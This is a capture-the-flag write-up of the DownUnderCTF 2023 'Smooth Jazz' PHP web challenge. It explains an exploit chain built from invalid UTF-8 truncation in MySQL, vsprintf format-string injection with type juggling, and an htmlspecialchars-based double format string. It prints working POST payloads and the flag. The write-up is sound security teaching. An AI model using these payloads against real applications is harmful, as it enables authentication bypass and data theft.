DownUnderCTF 2023: Smooth Jazz (Web)

2023-09-05

Even though I couldn’t solve this challenge during the DownUnderCTF competition, I discovered many interesting things along the way and found it very informative. So I decided to write it up, to analyze the challenge and to better understand the intended solution.

The challenge

The challenge is about a simple PHP application that allows (only) the admin to log in to the system (and listen to some smooth jazz in the meantime :D ).

The code of the index.php file is all we need:

<?php
function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect('db', 'challuser', 'challpass', 'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);

  $password = sha1($_POST['password']);

  $res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "%s"', [$username]);

  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }
  $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin"
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

  fail:
}
?>
<!DOCTYPE html>
<html>
<head>
  <title>🎷 Smooth Jazz</title>
  <style>
   ...
   ...
  </style>
</head>
<body>
  <div class="container">
    <h1>Smooth Jazz</h1>
    <form method="post">
      <label for="username">Username:</label>
      <input type="text" id="username" name="username" placeholder="Enter your username">

      <label for="password">Password:</label>
      <input type="password" id="password" name="password" placeholder="Enter your password">

      <input type="submit" value="Login">
    </form>
    <div class="music-player">
      <audio src="/offering-larry-stephens.mp3" id="audio"></audio>
      If you are stuck, you can <a href="javascript:document.getElementById('audio').play()">listen to some smooth jazz</a>.
    </div>
    <div id="message" class="message">
      <p><?= $message ?? '' ?></p>
    </div>
  </div>
</body>
</html>

We can immediately notice that:

  • in order to get the flag (which is stored in the FLAG environment variable), we need to login as admin
  • the username and password are provided via the POST parameters username and password (the password is immediately hashed with sha1) and are then checked with a couple of SQL database queries
    • the first query only checks that the provided username exists in the database (we know that only the user admin exists because the challenge also provided the SQL initialization script)
    • before executing the query, some sanitization is applied to the provided username (the symbols " and \ are escaped with \" and \\) by the strtr function
    • then our sanitized input is passed to a mysql_fquery function which basically uses vsprintf to format the SQL query and execute it
    • if the previous query returned at least 1 result, another mysql_fquery is executed: this time with the (hashed) password as parameter
    • if the previous query returns a valid row, htmlspecialchars is applied to the username; if the username is equal to admin we finally get the flag, otherwise we only get the server time
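
To make the sanitization step concrete, here is a minimal sketch of what the strtr call does to a username. The helper name escape_username is hypothetical and only used for illustration; the replacement map is copied from index.php.

```php
<?php
// Hypothetical helper wrapping the strtr call from index.php.
function escape_username(string $raw): string {
    // strtr with an array replaces every key in a single pass,
    // so the backslashes it inserts are not escaped a second time.
    return strtr($raw, ['"' => '\\"', '\\' => '\\\\']);
}

echo escape_username('admin" OR 1=1 #'), "\n"; // admin\" OR 1=1 #
echo escape_username('a\\b'), "\n";            // a\\b
```

A literal double quote or backslash in the username therefore always reaches the query in escaped form.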

Bypassing the first check

So we have many problems to overcome. We clearly need to perform some SQL injection to pass the checks and get the flag. However, it doesn’t look like a simple task. The username parameter is properly sanitized against SQL injection (the " character is escaped, and we need it to get a working SQL injection in this context). Also, the password parameter is immediately hashed, so there is no direct way to inject a " through it.

Here is where I discovered something unexpected: if you pass an invalid UTF-8 character, MySQL will automatically truncate the string from the invalid character to the end. This happens when the database uses the utf8 character set. A detailed explanation of this issue can be found here.

This means that both the following POST data payloads will pass the first check:

POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin&password=asasa

POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin%ffwhatever_you_want_here&password=asasa

The username payload admin%ffwhatever_you_want_here will be truncated by MySQL to admin, hence we pass the first check while still being able to append additional data to our username payload.
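
The truncation can be mimicked in pure PHP to see what the first query effectively compares against. This is only a rough stand-in for the MySQL behavior described above, not MySQL’s own logic: the helper valid_utf8_prefix is hypothetical, and its regex is a simplified UTF-8 check (it does not reject overlong encodings or surrogates).

```php
<?php
// Hypothetical helper: returns the longest leading run of well-formed
// UTF-8 sequences. Deliberately simplified, see the note above.
function valid_utf8_prefix(string $bytes): string {
    $pattern = '/^(?:[\x00-\x7F]|[\xC2-\xDF][\x80-\xBF]'
             . '|[\xE0-\xEF][\x80-\xBF]{2}|[\xF0-\xF4][\x80-\xBF]{3})*/';
    preg_match($pattern, $bytes, $m);
    return $m[0];
}

// "%ff" in the POST body is URL-decoded by PHP to the single byte 0xFF,
// which can never appear in valid UTF-8.
$username = "admin\xffwhatever_you_want_here";

var_dump(preg_match('//u', $username) === 1); // bool(false): not valid UTF-8
echo valid_utf8_prefix($username), "\n";      // admin
```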

Exploit vsprintf to get SQL injection

Now our payload will run against this additional check:

$res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);
if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
}

We clearly need to leverage the vsprintf formatting features to bypass it. To understand how this is possible, we first need to understand how vsprintf works.

vsprintf is similar to sprintf, but it takes a format string and an array of values and returns a string formatted accordingly.

We can use an interactive PHP shell (with the command php -a ) to see how vsprintf works. For example the following code:

echo vsprintf("%s-%s-%c-%s", ["This","is","97","string"]);

returns the string “This-is-a-string”.

Notice how we used the %c specifier to get the character whose ASCII code is the integer we passed in (in this case 97, the third value of the array, which becomes a).

Also, vsprintf allows us to specify which argument a specifier should use (by writing the argument number followed by $). For example:

echo vsprintf("Second character: %2\$c. First character: %1\$c",["97", "98"]);

will print:

Second character: b. First character: a

Notice that we had to escape the $ sign with a \ because the format is written as a double-quoted PHP string, where $c would otherwise be interpolated as a variable. We don’t need to escape the $ in our payload, though: it’s just part of the string returned by $_POST["username"].
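
As a small illustration of the quoting point, the sketch below writes the same format once as a double-quoted and once as a single-quoted PHP string (the variable names are just for this example):

```php
<?php
// Double-quoted: "$c" would be interpolated, so the "$" must be escaped.
$double = "Second character: %2\$c. First character: %1\$c";
// Single-quoted: no interpolation, so the "$" can be written as-is.
$single = 'Second character: %2$c. First character: %1$c';

var_dump($double === $single);              // bool(true)
echo vsprintf($single, ["97", "98"]), "\n";
// Second character: b. First character: a
```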

PHP type-juggling

Now that we know how to use vsprintf to produce arbitrary characters, we need to perform our SQL injection in the following query:

mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);

This means that if we could get the double quote ", we can escape the string context and perform SQL injection. But there is a problem: the argument of our format specifier will be the sha1 of our input password.

However, due to PHP’s implicit conversion (often referred to as type-juggling), any string that starts with a number is converted to that number when it is used in a numeric context, and %c treats its argument as an integer. For example:

echo 2 + "34this_is_not_a_number";

will result in 36.
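
The same conversion happens when such a string is handed to %c. The sketch below uses two made-up hash-like strings (they are not real digests) to show the case that works and one that does not:

```php
<?php
// Hypothetical hash-like strings, chosen only for illustration.
$good = '34d0ffee'; // digits "34" followed by a non-digit
$bad  = '340abcde'; // leading number is 340, not 34

var_dump((int) $good);                  // int(34)
var_dump(sprintf('%c', $good) === '"'); // bool(true)
var_dump(sprintf('%c', $bad));          // string(1) "T"  (340 % 256 = 84)
```

So the digits 34 have to be followed by a character that ends the number, otherwise a different byte comes out.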

So we can just find a password for which the corresponding sha1 hash starts with the digits 34 (the ASCII code for the double quote). For example sha1("pwvi") is equal to 34d034acfe28b90dc5ee27d1e47d6c9f91bd7faa and we can build the following payload to escape from the string context and perform SQL injection (notice that we added a # to comment out the remaining part and to avoid breaking the SQL query):

POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin%ff%1$'%c#&password=pwvi
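
The whole step can be reproduced offline. The sketch below is not the challenge code: find_quote_password is a hypothetical helper that tries the candidates "0", "1", "2", ... until the SHA-1 digest is rendered as a double quote by %c, and the query is then built the same way index.php builds it, without talking to a database.

```php
<?php
// Hypothetical helper: return the first numeric candidate whose SHA-1 hex
// digest is turned into a double quote by the %c specifier.
function find_quote_password(int $limit = 100000): ?string {
    for ($i = 0; $i < $limit; $i++) {
        $candidate = (string) $i;
        if (sprintf('%c', sha1($candidate)) === '"') {
            return $candidate;
        }
    }
    return null;
}

$password = find_quote_password();
if ($password === null) {
    exit("no candidate found\n");
}
$hash = sha1($password);

// Same steps as index.php, minus the database call.
$raw      = "admin\xff" . '%1$\'%c#'; // username from the request above
$username = strtr($raw, ['"' => '\\"', '\\' => '\\\\']);
$format   = 'SELECT * FROM users WHERE username = "' . $username
          . '" AND password = "%s"';
$query    = vsprintf($format, [$hash]);

echo $password, ' -> ', $hash, "\n";
echo $query, "\n";
```

The printed query has the form SELECT * FROM users WHERE username = "admin<0xFF>"#" AND password = "...", so everything after the # is treated as a comment by MySQL.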

Cool right?? Well, not really..

The problem is that even though we can now exfiltrate the admin password, it will still be a sha1 hash, and recovering the original value would require brute-forcing it, which is clearly not the intended way to solve the challenge.

So we need to go ahead and find a different way.

Using htmlspecialchars to build 2 payloads in 1

Looking at the following piece of code:

  $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin"
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

we see that it’s simply not possible to satisfy the condition $username === "admin", because we already “smuggled” extra data into the username to pass the previous checks. So we need to take the second branch, the one that sets $greeting to the string "Hello $htmlsafe_username, the server time is %s", where $htmlsafe_username is our username payload after being “sanitized” by htmlspecialchars.

Since $greeting is itself used as a format string for vsprintf, we could simply reuse the same technique as before, just by adding another format specifier to our username (%2$s, which would grab the value at the 2nd position, which is the flag). We could do something like:

username=admin%ff%1$c#%2$s

But unfortunately this will not survive the vsprintf call that builds the password query: the format string references 2 arguments while the array of values provides only 1, and this causes an error in the PHP backend.
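
The failure is easy to reproduce in isolation. In the sketch below, try_vsprintf is a hypothetical wrapper that returns null whenever vsprintf rejects the call (PHP 8 throws here, while older versions emit a warning and return false, so both cases are handled), and the hash is a made-up stand-in:

```php
<?php
// Hypothetical helper: the formatted string, or null if vsprintf fails.
function try_vsprintf(string $format, array $args): ?string {
    try {
        $out = @vsprintf($format, $args);
        return is_string($out) ? $out : null;
    } catch (\Throwable $e) {
        return null;
    }
}

$hash = '34d0ffee'; // hypothetical stand-in for the SHA-1 of the password

var_dump(try_vsprintf('%1$c#', [$hash]));     // string(2) ""#"
var_dump(try_vsprintf('%1$c#%2$s', [$hash])); // NULL
```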

And now is where things start to get a little bit crazy.. Basically we can leverage the htmlspecialchars sanitization to achieve our goal..

As a matter of fact, what happens if we use the following payload?

%1$'>%2$s

The previous payload can be interpreted in 2 different ways:

  • before the htmlspecialchars is called, it is interpreted as:

    • %1$'>% : takes the parameter at position 1, using > as the padding character ('(char) is an optional flag in vsprintf that can be used for padding). The trailing % is a valid specifier that simply outputs the character %
    • the remaining part is just the raw string 2$s
  • after htmlspecialchars is called, the string is converted to %1$'&gt;%2$s and it is interpreted as:

    • %1$'&g : takes the argument from position 1 (the value returned by date), uses & as padding and uses the g specifier (a general format specifier for a floating-point number)
    • t; is just the raw string t;
    • %2$s takes the argument from position 2 (the flag!)

So basically by leveraging the htmlspecialchars sanitization, it’s possible to build a format string that is different before and after htmlspecialchars is applied to our input!
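
Both interpretations can be checked with a few lines of PHP. This is only a sketch of the idea: the date and the flag are placeholder values, and the argument passed in the first pass is a made-up stand-in for the password hash.

```php
<?php
$payload = '%1$\'>%2$s';          // the string %1$'>%2$s
$date    = '2023-09-05 12:00:00'; // placeholder for date('Y-m-d H:i:s')
$flag    = 'FLAG{placeholder}';   // placeholder for getenv('FLAG')

// First pass (SQL query): one argument is enough, because "%1$'>%" is a
// single specifier that prints "%" and "2$s" is plain text.
$first = vsprintf($payload, ['34d0ffee']);
echo $first, "\n";                // %2$s

// htmlspecialchars turns ">" into "&gt;", which changes how the format parses.
$safe = htmlspecialchars($payload, ENT_COMPAT | ENT_SUBSTITUTE);
echo $safe, "\n";                 // %1$'&gt;%2$s

// Second pass (greeting): "%1$'&g" consumes the date, "t;" is literal,
// and "%2$s" now pulls in the second argument.
$second = vsprintf($safe, [$date, $flag]);
echo $second, "\n";
```

The last line printed ends with t; followed by the placeholder flag, preceded by whatever the g specifier makes of the date string.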

The final payload to get the flag is:

username=admin%ff%1$c#%1$'>%2$s&password=pwvi

which reveals the flag (and some additional garbage that you can just ignore):

DUCTF{at_least_you_can_enjoy_the_jazz}